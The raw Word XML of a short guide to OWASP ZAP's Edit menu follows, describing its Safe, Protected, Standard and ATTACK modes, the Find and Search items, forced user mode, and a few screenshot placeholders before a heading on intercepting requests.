    <w:p w:rsidR="37573033" w:rsidP="55820FFD" w:rsidRDefault="37573033" w14:paraId="1AE539AA" w14:textId="3CEF9C4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="002060" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="6799758A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Edit Menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="182B80DF" w14:textId="50307069">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ZAP Mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="3DA4F9DC" w14:textId="65D5418F">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This allows you to change the current </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mode</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F88997B" w:rsidP="55820FFD" w:rsidRDefault="0F88997B" w14:paraId="4A2EADB1" w14:textId="424F1ED7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="300" w:afterAutospacing="off"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="0F88997B">
        <w:drawing>
          <wp:inline wp14:editId="729BEF91" wp14:anchorId="195E14C3">
            <wp:extent cx="2181225" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1551060646" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R83d61a4c1def4829">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2181225" cy="1628775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="55820FFD" w:rsidRDefault="37573033" w14:paraId="5B74995A" w14:textId="6FF35299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="002060" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="34223F5C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="002060"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Modes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="079D7B3A" w:rsidP="449E37A7" w:rsidRDefault="079D7B3A" w14:paraId="65A4BD88" w14:textId="20F7DA3A">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="300" w:afterAutospacing="off"/>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ZAP has a ‘mode’ which can be:</w:t>
      </w:r>
      <w:r w:rsidR="079D7B3A">
        <w:drawing>
          <wp:inline wp14:editId="0DA4D682" wp14:anchorId="264326AA">
            <wp:extent cx="4572000" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1976487150" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R896119b945a443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181100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="7DAC143F" w14:textId="422B451B">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Safe - no potentially dangerous operations </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permitted</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p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="3D20BE5C" w14:textId="07350645">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Protected - you can only perform (potentially) dangerous actions on URLs in the </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scope</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p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="36D5BB87" w14:textId="0121AEC1">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Standard - does not restrict anything.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="3ED7E9B6" w14:textId="5460D23E">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ATTACK - new nodes that are in </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scope</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are </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actively scanned</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as soon as they are discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="18E3209D" w14:textId="5C80C9B6">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It is recommended that you use </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="1548395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Protected</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mode to ensure that you only attack sites that you mean to.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="0524AE80" w14:textId="735C5087">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The mode can be changed via the </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toolbar</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(or the ZAP API) and is persisted between sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="1E9F538D" w14:textId="1D5C0016">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Examples of the things that will not be possible in either Safe mode or in Protected mode when not acting on URLs in the Scope:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="3F40A7D2" w14:textId="67192B26">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Spidering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="6C22D4D9" w14:textId="5F35AA6E">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Active Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="7C6AF0F8" w14:textId="7BD0E063">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Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="3CA1C466" w14:textId="4D57C2BF">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Force Browsing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="28173951" w14:textId="4CC68E63">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Breaking (intercepting)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="279FD4D2" w14:textId="42279B5F">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Resending requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="35196B63" w14:textId="268D2800">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You can define the </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Scan Policy</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to be used for the Attack mode the </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Options Active Scan screen</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="34223F5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p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="350688F8" w14:textId="7A6A669D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="3D3AA33F" w14:textId="5F9054CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758A">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t xml:space="preserve">Find… </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="7327CC2C" w14:textId="237DA658">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This opens the </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Find dialog</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which allows you to find a string in the currently selected window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="5597AD6F" w14:textId="35E18E3D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Searc</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="44D31D31">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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758A">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0"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="3946A4F3" w14:textId="4770C844">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This sub-menu </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facilitates</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access to the following items:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="391A0382" w14:textId="7F84FB02">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758A">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t>Search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="1BED446C" w14:textId="43007BFF">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This selects the </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Search tab</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which allows you to search for regular expressions in all URLs, requests, and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="5DBFA463" w14:textId="0C6B6C5C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758A">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t xml:space="preserve">Next Result </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="56216DED" w14:textId="7C771177">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This selects the next occurrence of the last string searched for.</w:t>
      </w:r>
      <w:r>
        <w:br/>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The relevant message will be selected in the Search tab and the string will be displayed and highlighted in the </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Request</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or </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Response</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tab as appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="2763AE55" w14:textId="0E8EC32C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758A">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t>Previous</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758A">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t xml:space="preserve"> Result </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="00BD4733" w14:textId="0B6BA056">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This selects the </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previous</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occurrence of the last string searched for.</w:t>
      </w:r>
      <w:r>
        <w:br/>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The relevant message will be selected in the Search tab and the string will be displayed and highlighted in the </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Request</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or </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Response</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tab as appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="37573033" w:rsidP="449E37A7" w:rsidRDefault="37573033" w14:paraId="3AC0F432" w14:textId="52E14D29">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable / Disable Forced User Mode </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="449E37A7" w:rsidRDefault="5D3B8CE6" w14:paraId="7E44C5CA" w14:textId="25DF80B7">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="300" w:afterAutospacing="off"/>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560166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This switches</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forced user mode on and off.</w:t>
      </w:r>
      <w:r>
        <w:br/>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The menu item is only enabled when you have defined a forced user for at least one </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context</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which can be done via the </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Session Contexts</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="6799758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dialog.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="449E37A7" w:rsidRDefault="5D3B8CE6" w14:paraId="4B4974AD" w14:textId="65BC5239">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="300" w:afterAutospacing="off"/>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br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3D0BD7D3">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In </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3D0BD7D3">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Workspace</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3D0BD7D3">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window we can change the </w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3D0BD7D3">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dat</w:t>
      </w:r>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3D0BD7D3">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a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6D2AE285" w:rsidP="764D761D" w:rsidRDefault="6D2AE285" w14:paraId="1CC54F5F" w14:textId="23810C99">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6D2AE285">
        <w:drawing>
          <wp:inline wp14:editId="0B3EF891" wp14:anchorId="506CBB48">
            <wp:extent cx="4572000" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2065078242" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rcf4a58c5a3f344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57450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="764D761D" w:rsidRDefault="5D3B8CE6" w14:paraId="1F2EBCD7" w14:textId="0742C938">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6D2AE285" w:rsidP="764D761D" w:rsidRDefault="6D2AE285" w14:paraId="4C66B97A" w14:textId="387DCDAE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6D2AE285">
        <w:drawing>
          <wp:inline wp14:editId="3E2D914A" wp14:anchorId="38884A3E">
            <wp:extent cx="4572000" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1701250258" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Raa14408a12bd41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57450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="46ACD5F6" w:rsidP="764D761D" w:rsidRDefault="46ACD5F6" w14:paraId="273C1B8D" w14:textId="22A855F3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="764D761D" w:rsidR="46ACD5F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
        <w:t xml:space="preserve">Changing the password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46ACD5F6" w:rsidP="764D761D" w:rsidRDefault="46ACD5F6" w14:paraId="0F372F11" w14:textId="000C41FA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="46ACD5F6">
        <w:drawing>
          <wp:inline wp14:editId="61148C48" wp14:anchorId="76BBBC4C">
            <wp:extent cx="4572000" cy="1819275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1497092232" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rc2eefd130f994b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819275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="764D761D" w:rsidRDefault="5D3B8CE6" w14:paraId="4E759BA2" w14:textId="532326B5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="449E37A7" w:rsidRDefault="5D3B8CE6" w14:paraId="3F079A6D" w14:textId="1A22EFDE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="46ACD5F6">
        <w:drawing>
          <wp:inline wp14:editId="68A66F15" wp14:anchorId="2876AAF7">
            <wp:extent cx="4572000" cy="2266950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1989319708" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3537c7598b7845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66950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="764D761D" w:rsidRDefault="5D3B8CE6" w14:paraId="2DF3D533" w14:textId="6856E320">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="764D761D" w:rsidRDefault="5D3B8CE6" w14:paraId="1D26DF34" w14:textId="213258C0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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p>
    <w:p w:rsidR="7CD0F289" w:rsidP="764D761D" w:rsidRDefault="7CD0F289" w14:paraId="19EC220D" w14:textId="75B96C67">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7CD0F289">
        <w:drawing>
          <wp:inline wp14:editId="56E881DE" wp14:anchorId="1851101C">
            <wp:extent cx="4572000" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2096128051" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R258c33f32eac43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57450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="764D761D" w:rsidRDefault="5D3B8CE6" w14:paraId="118D7B42" w14:textId="046E63B4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="5D3B8CE6" w:rsidP="449E37A7" w:rsidRDefault="5D3B8CE6" w14:paraId="6A43F01C" w14:textId="109BC674">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="002060" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="449E37A7" w:rsidR="3BE8AFA4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="002060"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Intercepting Specific Requests with OWASP ZAP</w:t>
      </w:r>
    </w:p>
